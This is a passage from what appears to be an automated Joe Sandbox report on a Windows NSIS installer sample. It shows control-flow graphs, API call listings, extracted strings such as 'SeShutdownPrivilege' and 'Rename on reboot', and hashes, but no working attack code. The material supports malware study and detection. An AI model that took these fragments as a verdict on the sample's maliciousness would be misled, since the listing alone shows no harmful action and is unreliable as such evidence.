call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                                                          APIs
                                                                          • #17.COMCTL32 ref: 004038A2
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                          • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                          • API String ID: 2435955865-239407132
                                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                          Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 646 4074bb-4074c0 647 4074c2-4074ef 646->647 648 40752f-407547 646->648 650 4074f1-4074f4 647->650 651 4074f6-4074fa 647->651 649 407aeb-407aff 648->649 655 407b01-407b17 649->655 656 407b19-407b2c 649->656 652 407506-407509 650->652 653 407502 651->653 654 4074fc-407500 651->654 657 407527-40752a 652->657 658 40750b-407514 652->658 653->652 654->652 659 407b33-407b3a 655->659 656->659 662 4076f6-407713 657->662 663 407516 658->663 664 407519-407525 658->664 660 407b61-407c68 659->660 661 407b3c-407b40 659->661 677 407350 660->677 678 407cec 660->678 666 407b46-407b5e 661->666 667 407ccd-407cd4 661->667 669 407715-407729 662->669 670 40772b-40773e 662->670 663->664 665 407589-4075b6 664->665 673 4075d2-4075ec 665->673 674 4075b8-4075d0 665->674 666->660 671 407cdd-407cea 667->671 675 407741-40774b 669->675 670->675 676 407cef-407cf6 671->676 679 4075f0-4075fa 673->679 674->679 680 40774d 675->680 681 4076ee-4076f4 675->681 682 407357-40735b 677->682 683 40749b-4074b6 677->683 684 40746d-407471 677->684 685 4073ff-407403 677->685 678->676 688 407600 679->688 689 407571-407577 679->689 690 407845-4078a1 680->690 691 4076c9-4076cd 680->691 681->662 687 407692-40769c 681->687 682->671 692 407361-40736e 682->692 683->649 697 407c76-407c7d 684->697 698 407477-40748b 684->698 703 407409-407420 685->703 704 407c6d-407c74 685->704 693 4076a2-4076c4 687->693 694 407c9a-407ca1 687->694 706 407556-40756e 688->706 707 407c7f-407c86 688->707 695 40762a-407630 689->695 696 40757d-407583 689->696 690->649 699 407c91-407c98 691->699 700 4076d3-4076eb 691->700 692->678 708 407374-4073ba 692->708 693->690 694->671 709 40768e 695->709 710 407632-40764f 695->710 696->665 696->709 697->671 705 40748e-407496 698->705 699->671 700->681 711 407423-407427 703->711 704->671 705->684 715 407498 705->715 706->689 707->671 713 4073e2-4073e4 708->713 714 4073bc-4073c0 708->714 709->687 716 407651-407665 710->716 717 407667-40767a 710->717 711->685 712 407429-40742f 711->712 719 407431-407438 712->719 720 407459-40746b 712->720 723 4073f5-4073fd 713->723 724 4073e6-4073f3 713->724 721 4073c2-4073c5 GlobalFree 714->721 722 4073cb-4073d9 GlobalAlloc 714->722 715->683 718 40767d-407687 716->718 717->718 718->695 725 407689 718->725 726 407443-407453 GlobalAlloc 719->726 727 40743a-40743d GlobalFree 719->727 720->705 721->722 722->678 728 4073df 722->728 723->711 724->723 724->724 730 407c88-407c8f 725->730 731 40760f-407627 725->731 726->678 726->720 727->726 728->713 730->671 731->695
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                          Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                          • String ID:
                                                                          • API String ID: 310444273-0
                                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                          Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                                                          APIs
                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                          • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                          Strings
                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                          • Sleep(%d), xrefs: 0040169D
                                                                          • Rename: %s, xrefs: 004018F8
                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                          • Jump: %d, xrefs: 00401602
                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                          • Call: %d, xrefs: 0040165A
                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                          • detailprint: %s, xrefs: 00401679
                                                                          • BringToFront, xrefs: 004016BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                          • API String ID: 2872004960-3619442763
                                                                          • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                          • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                          Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                                                          APIs
                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                          • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                          • API String ID: 608394941-1650083594
                                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                          • CompareFileTime.KERNEL32(-00000014,?,FarmFolk,FarmFolk,00000000,00000000,FarmFolk,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
